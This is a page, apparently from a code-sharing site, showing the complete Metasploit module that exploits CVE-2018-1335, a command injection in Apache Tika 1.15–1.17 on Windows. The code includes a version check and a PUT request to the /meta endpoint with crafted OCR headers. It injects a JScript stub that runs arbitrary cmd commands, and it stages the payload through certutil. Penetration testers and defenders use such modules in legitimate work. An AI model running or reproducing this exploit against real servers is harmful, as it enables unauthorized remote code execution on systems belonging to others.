Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/http/apache_tika_jp2_jscript.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::CmdStager9include Msf::Exploit::Remote::HttpClient10include Msf::Exploit::Powershell11prepend Msf::Exploit::Remote::AutoCheck1213def initialize(info = {})14super(update_info(info,15'Name' => 'Apache Tika Header Command Injection',16'Description' => %q{17This module exploits a command injection vulnerability in Apache18Tika 1.15 - 1.17 on Windows. A file with the image/jp2 content-type is19used to bypass magic bytes checking. When OCR is specified in the20request, parameters can be passed to change the parameters passed21at command line to allow for arbitrary JScript to execute. A22JScript stub is passed to execute arbitrary code. This module was23verified against version 1.15 - 1.17 on Windows 2012.24While the CVE and finding show more versions vulnerable, during25testing it was determined only > 1.14 was exploitable due to26jp2 support being added.27},28'License' => MSF_LICENSE,29'Privileged' => false,30'Platform' => 'win',31'Targets' =>32[33['Windows',34{'Arch' => [ARCH_X86, ARCH_X64],35'Platform' => 'win',36'CmdStagerFlavor' => ['certutil']37}38]39],40'DefaultTarget' => 0,41'DisclosureDate' => '2018-04-25',42'Author' =>43[44'h00die', # msf module45'David Yesland', # edb submission46'Tim Allison' # discovery47],48'References' =>49[50['EDB', '46540'],51['URL', 'https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/'],52['URL', 'https://lists.apache.org/thread.html/b3ed4432380af767effd4c6f27665cc7b2686acccbefeb9f55851dca@%3Cdev.tika.apache.org%3E'],53['CVE', '2018-1335']54]))5556register_options(57[58Opt::RPORT(9998),59OptString.new('TARGETURI', [true, 'The base path to the web application', '/'])60])61end6263def check64res = send_request_cgi({65'uri' => normalize_uri(target_uri),66})67if res.nil?68vprint_error('No server response, check configuration')69return CheckCode::Safe70elsif res.code != 20071vprint_error('No server response, check configuration')72return CheckCode::Safe73end7475if res.body =~ /Apache Tika (\d.[\d]+)/76version = Rex::Version.new($1)77vprint_status("Apache Tika Version Detected: #{version}")78if version.between?(Rex::Version.new('1.15'), Rex::Version.new('1.17'))79return CheckCode::Vulnerable80end81end82CheckCode::Safe83end8485def execute_command(cmd, opts = {})86cmd.gsub(/"/, '\"')87jscript="var oShell = WScript.CreateObject('WScript.Shell');\n"88jscript << "var oExec = oShell.Exec(\"cmd /c #{cmd}\");"8990print_status("Sending PUT request to #{peer}#{normalize_uri(target_uri, 'meta')}")91res = send_request_cgi({92'method' => 'PUT',93'uri' => normalize_uri(target_uri, 'meta'),94'headers' => {95"X-Tika-OCRTesseractPath" => '"cscript"',96"X-Tika-OCRLanguage" => "//E:Jscript",97"Expect" => "100-continue",98"Content-type" => "image/jp2",99"Connection" => "close"},100'data' => jscript101})102103fail_with(Failure::Disconnected, 'No server response') unless res104unless (res.code == 200 && res.body.include?('tika'))105fail_with(Failure::UnexpectedReply, 'Invalid response received, target may not be vulnerable')106end107end108109def exploit110execute_cmdstager(linemax: 8000)111end112end113114115